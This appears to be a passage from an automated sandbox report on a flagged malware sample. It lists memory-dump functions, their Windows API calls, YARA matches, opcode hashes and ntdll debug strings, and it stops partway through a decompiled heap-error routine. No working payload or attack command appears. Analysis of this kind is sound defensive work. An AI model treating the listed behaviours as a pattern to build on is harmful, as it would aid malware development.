                                                                    Function 01779860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 42d680c767fc807cfd26ee6d7e5da497fb3ec73bb266bf45d793f20936cff6ba
                                                                    • Instruction ID: 2bd5919e88714193f29911616f0508cfeda5cdc7f670760f41842329c17a0e4f
                                                                    • Opcode Fuzzy Hash: 42d680c767fc807cfd26ee6d7e5da497fb3ec73bb266bf45d793f20936cff6ba
                                                                    • Instruction Fuzzy Hash: 2F90027124500417D1217199C504B075009A7D4281F91C422E041455CDD6968952B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3e208460d600e2e51451afc7bd2a4eea1a5e3a9b9cc9f6b0c47125f37460411b
                                                                    • Instruction ID: 508186fb2cfded73a4f089206a1b60fad9520664b0f2a3da021fb72835730888
                                                                    • Opcode Fuzzy Hash: 3e208460d600e2e51451afc7bd2a4eea1a5e3a9b9cc9f6b0c47125f37460411b
                                                                    • Instruction Fuzzy Hash: 7C900261286041565555B199C4049079006B7E4281791C022E1404954CC5669856F661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017798F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1edce07bd4535f6fae5074ae367ba8f0e268897b566ee16ce27f14205d341701
                                                                    • Instruction ID: a39710d3f77afb66d058e72b7e279df777655238508491215038944a314520d9
                                                                    • Opcode Fuzzy Hash: 1edce07bd4535f6fae5074ae367ba8f0e268897b566ee16ce27f14205d341701
                                                                    • Instruction Fuzzy Hash: 2890026164500506D1117199C404A16500AA7D4281F91C032E1014559ECA658992B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 679d60f56721b449bf2696366a336b90a0d294d5817eb7c55fc56312ad8ed973
                                                                    • Instruction ID: dad9c040ba12159cd864e08e64d24f74c49e13ae3687ead8c07960c545250216
                                                                    • Opcode Fuzzy Hash: 679d60f56721b449bf2696366a336b90a0d294d5817eb7c55fc56312ad8ed973
                                                                    • Instruction Fuzzy Hash: 8590026125580046D21075A9CC14F075005A7D4343F51C125E0144558CC95588617561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d9b73d454782cf347562b7b854f2009a9251738b1ad830d4f7c470d478c4eab0
                                                                    • Instruction ID: 8d3223bf904b67048c4cfa1214fe2532237efd25386b507f13105443f47b1234
                                                                    • Opcode Fuzzy Hash: d9b73d454782cf347562b7b854f2009a9251738b1ad830d4f7c470d478c4eab0
                                                                    • Instruction Fuzzy Hash: E790026164500046415071A9C844D069005BBE5251751C131E0988554DC599886576A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4b0eb5f9f84ecbf878179d32d5a601a2703111a53a48fcd12da478b1c0d02d81
                                                                    • Instruction ID: 55859acc61968ad77d4a2c93a8a82a82b72851bca6ec76ea3b2ca8c055457d3f
                                                                    • Opcode Fuzzy Hash: 4b0eb5f9f84ecbf878179d32d5a601a2703111a53a48fcd12da478b1c0d02d81
                                                                    • Instruction Fuzzy Hash: 4790027124540406D1107199C814B0B5005A7D4342F51C021E1154559DC665885175B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5f6e3829215884b26eded7e1d37023745882a3cb8ba8939b8f321e4e3909d044
                                                                    • Instruction ID: 9966db121b8c030af6e55580ff80fe879c88bedfab1e472fb111a3138541315a
                                                                    • Opcode Fuzzy Hash: 5f6e3829215884b26eded7e1d37023745882a3cb8ba8939b8f321e4e3909d044
                                                                    • Instruction Fuzzy Hash: D7900265255000070115B59987049075046A7D9391351C031F1005554CD66188617161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 39e218ee8adb945aaad8860bc5957cd0e211f0b405239865dce7ea444ab31779
                                                                    • Instruction ID: a49e9a3960065345fe8eebc9d0bcc5a5b5d6dcef72872ca5e1127532284be3d9
                                                                    • Opcode Fuzzy Hash: 39e218ee8adb945aaad8860bc5957cd0e211f0b405239865dce7ea444ab31779
                                                                    • Instruction Fuzzy Hash: F39002A12460000741157199C414A16900AA7E4241B51C031E1004594DC56588917165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: fa73e2d2ce019f7a6fdbc6ac7a2f7237b3476536ac1b92a333dff3700320a3d1
                                                                    • Instruction ID: 3210e63192e8992dd1d9479d9318080ee6c4f7c6eb89c431d15d69dc8fdca38c
                                                                    • Opcode Fuzzy Hash: fa73e2d2ce019f7a6fdbc6ac7a2f7237b3476536ac1b92a333dff3700320a3d1
                                                                    • Instruction Fuzzy Hash: 1B90027124500406D11075D9D408A465005A7E4341F51D021E5014559EC6A588917171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7bc7bc1d3e7b46c26274b9074f437a6d514b08a0958799e764655dffcc98e944
                                                                    • Instruction ID: b582540a66b8fdeac5070419f4576c3f3b0365fd6d4e97d9eb18b06db570bdc8
                                                                    • Opcode Fuzzy Hash: 7bc7bc1d3e7b46c26274b9074f437a6d514b08a0958799e764655dffcc98e944
                                                                    • Instruction Fuzzy Hash: 9B90027135514406D1207199C404B065005A7D5241F51C421E081455CDC6D588917162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017797A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 87e071bb4d77af58e428bc1f1c8fd6e248852eb7e2c857fd3635bf2e355ac133
                                                                    • Instruction ID: 1d739e7e298b658a640c93891525d04a303ed4e11e5cf1b761082110ba3ec658
                                                                    • Opcode Fuzzy Hash: 87e071bb4d77af58e428bc1f1c8fd6e248852eb7e2c857fd3635bf2e355ac133
                                                                    • Instruction Fuzzy Hash: 6990026134500007D1507199D418A069005F7E5341F51D021E0404558CD95588567262
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 721bd8ae68c7130f082d1834ad274aa84b3dc38face2f4baf10836297ff48987
                                                                    • Instruction ID: d651c38ec4f6cb1c583086468c07a05bd5d8e36020711aa54685a06f9797c3a6
                                                                    • Opcode Fuzzy Hash: 721bd8ae68c7130f082d1834ad274aa84b3dc38face2f4baf10836297ff48987
                                                                    • Instruction Fuzzy Hash: 9790026925700006D1907199D408A0A5005A7D5242F91D425E000555CCC95588697361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 04cf8c0363711b3f7b3c9913b430aa2ef8eae10354c16a43ecb05125a6fbc56c
                                                                    • Instruction ID: 35da7bba118a46eab94dddfe866e31208d7a045f1d8f16806097141380d41ec2
                                                                    • Opcode Fuzzy Hash: 04cf8c0363711b3f7b3c9913b430aa2ef8eae10354c16a43ecb05125a6fbc56c
                                                                    • Instruction Fuzzy Hash: 2A90027124500806D1907199C404A4A5005A7D5341F91C025E0015658DCA558A5977E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b9b517e35b1c94f1aca79bc310ca0b8a9ed53c8b98d700d182df391e4aaf2bba
                                                                    • Instruction ID: 5fc2c1157e5e3468d3fcd5ea2616ea22a04fd49ff419266a686798a928020df1
                                                                    • Opcode Fuzzy Hash: b9b517e35b1c94f1aca79bc310ca0b8a9ed53c8b98d700d182df391e4aaf2bba
                                                                    • Instruction Fuzzy Hash: F890027124508806D1207199C404B4A5005A7D4341F55C421E441465CDC6D588917161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                    • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                    • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                    • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407206, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 3333
                                                                    • API String ID: 1836367815-2924271548
                                                                    • Opcode ID: 8df30e0fd6041824e6e0a0fe0a02ca72f2d876522b7c0239830edda3765c1955
                                                                    • Instruction ID: 0aeaff593dfd710ad47aa5329f12881aa18fdf2f6c807c81e318b1fc18521893
                                                                    • Opcode Fuzzy Hash: 8df30e0fd6041824e6e0a0fe0a02ca72f2d876522b7c0239830edda3765c1955
                                                                    • Instruction Fuzzy Hash: 5E110A31B442147BDB20A695DC42FFE376C5B01B64F14446EFA04FB2C1D668AD0142EA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                    • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                    • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                    • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004184F2, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: 0e9544c33a6aa06f0dc466b5a8b38a4077844c5d2da60abf6bd6129510403572
                                                                    • Instruction ID: a6dff3bbc9822969be49a7d41e02aa08f90bbb9b3a04c31e652e8ee984644f1b
                                                                    • Opcode Fuzzy Hash: 0e9544c33a6aa06f0dc466b5a8b38a4077844c5d2da60abf6bd6129510403572
                                                                    • Instruction Fuzzy Hash: A7F020312003487AD720EB688C88EE77BADDF89740F00C1ADF9A92B242C935E90187F0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418612, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: bc3e293d34da4c6a8a3200352f5f1f8ebf8de40a28ec3b926d6e44eca1862c8c
                                                                    • Instruction ID: 1cf8fd39b7fcaf75c1d1313f0906113975813a903783c27d0244b3c8946e43cf
                                                                    • Opcode Fuzzy Hash: bc3e293d34da4c6a8a3200352f5f1f8ebf8de40a28ec3b926d6e44eca1862c8c
                                                                    • Instruction Fuzzy Hash: D5F0A9B1200204AFCB10DF48DC81FE73769EF89240F108118FA089B381CA30A822CBE5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004184BB, Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: dd8b8a557460d852979bae4835e06237597004c062e4f83ec1cc7eb28e932e7e
                                                                    • Instruction ID: 2cf1158614a209b71be80f91dfb57c1e7371c6485e89acfdb94b89563314a81a
                                                                    • Opcode Fuzzy Hash: dd8b8a557460d852979bae4835e06237597004c062e4f83ec1cc7eb28e932e7e
                                                                    • Instruction Fuzzy Hash: D6E01AB5600214ABDB14DF55DC45EE77769AF88760F014599FE086B381CA30ED10CAE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0177967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e52c5476a837171dc8a978811fbc4c23597294151a432131ad7c373fcd3f6cb1
                                                                    • Instruction ID: 8d8b8b9df7de148bfabd18389c0285160d661019b1c164103e54c779b07a4feb
                                                                    • Opcode Fuzzy Hash: e52c5476a837171dc8a978811fbc4c23597294151a432131ad7c373fcd3f6cb1
                                                                    • Instruction Fuzzy Hash: 39B09B719464C5C9DA11E7A48608F17F90077D4755F16C171D2024645B4778C091F5B5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 017EB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017EB53F
                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 017EB48F
                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017EB3D6
                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017EB476
                                                                    • The instruction at %p referenced memory at %p., xrefs: 017EB432
                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017EB305
                                                                    • The resource is owned shared by %d threads, xrefs: 017EB37E
                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017EB323
                                                                    • an invalid address, %p, xrefs: 017EB4CF
                                                                    • write to, xrefs: 017EB4A6
                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017EB47D
                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017EB2DC
                                                                    • *** enter .cxr %p for the context, xrefs: 017EB50D
                                                                    • This failed because of error %Ix., xrefs: 017EB446
                                                                    • *** Inpage error in %ws:%s, xrefs: 017EB418
                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 017EB352
                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017EB484
                                                                    • a NULL pointer, xrefs: 017EB4E0
                                                                    • <unknown>, xrefs: 017EB27E, 017EB2D1, 017EB350, 017EB399, 017EB417, 017EB48E
                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 017EB39B
                                                                    • The critical section is owned by thread %p., xrefs: 017EB3B9
                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017EB314
                                                                    • read from, xrefs: 017EB4AD, 017EB4B2
                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 017EB2F3
                                                                    • *** enter .exr %p for the exception record, xrefs: 017EB4F1
                                                                    • The resource is owned exclusively by thread %p, xrefs: 017EB374
                                                                    • Go determine why that thread has not released the critical section., xrefs: 017EB3C5
                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017EB38F
                                                                    • The instruction at %p tried to %s , xrefs: 017EB4B6
                                                                    • *** then kb to get the faulting stack, xrefs: 017EB51C
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                    • API String ID: 0-108210295
                                                                    • Opcode ID: ffbb633c31583176b958083514b74cd13b4826a55fd77658c977be8cf3e48d4d
                                                                    • Instruction ID: 2078786cc64fa6bc0757e2697b06f268a654d40d79fd040114afe7d949142c38
                                                                    • Opcode Fuzzy Hash: ffbb633c31583176b958083514b74cd13b4826a55fd77658c977be8cf3e48d4d
                                                                    • Instruction Fuzzy Hash: 4D8106B5A40220FFDB316A8ACC5ED7BFFA5EF5AB51F40408CF5046B116D2629492C7B2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017F1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 44%
                                                                    			E017F1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x17148a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0173B150();
				} else {
					E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x182589c);
				E0173B150("Heap error detected at %p (heap handle %p)\n",  *0x18258a0);
				_t27 =  *0x1825898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M017F1E96))) {
						case 0:
